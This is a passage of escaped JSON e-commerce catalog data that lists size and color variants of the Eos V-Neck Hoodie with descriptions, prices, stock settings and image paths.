l,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh11-blue_back.jpg\",\"image\":\"\\/w\\/h\\/wh11-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh11-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh11-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Blue\"},\"1136\":{\"sku\":\"WH11-S-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Eos V-Neck Hoodie-S-Green\",\"description\":\"<p>Getting chilly before class starts? Wear the Eos on your way to and from yoga for a cute and cozy warmup piece. Reach for its reliable comfort and enjoy a super-soft blend of fabrics finished in sporty style that includes a hidden kangaroo pocket.<\\/p>\\n<p>Semi-fitted. <br \\/>Long-Sleeve. <br \\/>Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"54\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"eos-v-neck-hoodie-s-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh11-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh11-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh11-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh11-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh11-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Green\"},\"1137\":{\"sku\":\"WH11-S-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Eos V-Neck Hoodie-S-Orange\",\"description\":\"<p>Getting chilly before class starts? Wear the Eos on your way to and from yoga for a cute and cozy warmup piece. Reach for its reliable comfort and enjoy a super-soft blend of fabrics finished in sporty style that includes a hidden kangaroo pocket.<\\/p>\\n<p>Semi-fitted. <br \\/>Long-Sleeve. <br \\/>Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"54\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"eos-v-neck-hoodie-s-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh11-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh11-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh11-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh11-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh11-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Orange\"},\"1138\":{\"sku\":\"WH11-M-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Eos V-Neck Hoodie-M-Blue\",\"description\":\"<p>Getting chilly before class starts? Wear the Eos on your way to and from yoga for a cute and cozy warmup piece. Reach for its reliable comfort and enjoy a super-soft blend of fabrics finished in sporty style that includes a hidden kangaroo pocket.<\\/p>\\n<p>Semi-fitted. <br \\/>Long-Sleeve. <br \\/>Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"54\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"eos-v-neck-hoodie-m-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh11-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh11-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh11-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh11-blue_back.jpg\",\"image\":\"\\/w\\/h\\/wh11-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh11-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh11-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Blue\"},\"1139\":{\"sku\":\"WH11-M-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Eos V-Neck Hoodie-M-Green\",\"description\":\"<p>Getting chilly before class starts? Wear the Eos on your way to and from yoga for a cute and cozy warmup piece. Reach for its reliable comfort and enjoy a super-soft blend of fabrics finished in sporty style that includes a hidden kangaroo pocket.<\\/p>\\n<p>Semi-fitted. <br \\/>Long-Sleeve. <br \\/>Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"54\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"eos-v-neck-hoodie-m-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh11-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh11-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh11-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh11-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh11-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Green\"},\"1140\":{\"sku\":\"WH11-M-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Eos V-Neck Hoodie-M-Orange\",\"description\":\"<p>Getting chilly before class starts? Wear the Eos on your way to and from yoga for a cute and cozy warmup piece. Reach for its reliable comfort and enjoy a super-soft blend of fabrics finished in sporty style that includes a hidden kangaroo pocket.<\\/p>\\n<p>Semi-fitted. <br \\/>Long-Sleeve. <br \\/>Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"54\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"eos-v-neck-hoodie-m-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh11-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh11-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh11-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh11-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh11-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Orange\"},\"1141\":{\"sku\":\"WH11-L-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Eos V-Neck Hoodie-L-Blue\",\"description\":\"<p>Getting chilly before class starts? Wear the Eos on your way to and from yoga for a cute and cozy warmup piece. Reach for its reliable comfort and enjoy a super-soft blend of fabrics finished in sporty style that includes a hidden kangaroo pocket.<\\/p>\\n<p>Semi-fitted. <br \\/>Long-Sleeve. <br \\/>Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"54\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"eos-v-neck-hoodie-l-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh11-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh11-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh11-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh11-blue_back.jpg\",\"image\":\"\\/w\\/h\\/wh11-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh11-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh11-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Blue\"},\"1142\":{\"sku\":\"WH11-L-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Eos V-Neck Hoodie-L-Green\",\"description\":\"<p>Getting chilly before class starts? Wear the Eos on your way to and from yoga for a cute and cozy warmup piece. Reach for its reliable comfort and enjoy a super-soft blend of fabrics finished in sporty style that includes a hidden kangaroo pocket.<\\/p>\\n<p>Semi-fitted. <br \\/>Long-Sleeve. <br \\/>Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"54\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"eos-v-neck-hoodie-l-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh11-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh11-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh11-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh11-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh11-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Green\"},\"1143\":{\"sku\":\"WH11-L-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Eos V-Neck Hoodie-L-Orange\",\"description\":\"<p>Getting chilly before class starts? Wear the Eos on your way to and from yoga for a cute and cozy warmup piece. Reach for its reliable comfort and enjoy a super-soft blend of fabrics finished in sporty style that includes a hidden kangaroo pocket.<\\/p>\\n<p>Semi-fitted. <br \\/>Long-Sleeve. <br \\/>Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"54\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"eos-v-neck-hoodie-l-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh11-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh11-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh11-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh11-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh11-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Orange\"},\"1144\":{\"sku\":\"WH11-XL-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Eos V-Neck Hoodie-XL-Blue\",\"description\":\"<p>Getting chilly before class starts? Wear the Eos on your way to and from yoga for a cute and cozy warmup piece. Reach for its reliable comfort and enjoy a super-soft blend of fabrics finished in sporty style that includes a hidden kangaroo pocket.<\\/p>\\n<p>Semi-fitted. <br \\/>Long-Sleeve. <br \\/>Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"54\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"eos-v-neck-hoodie-xl-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh11-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh11-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh11-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"c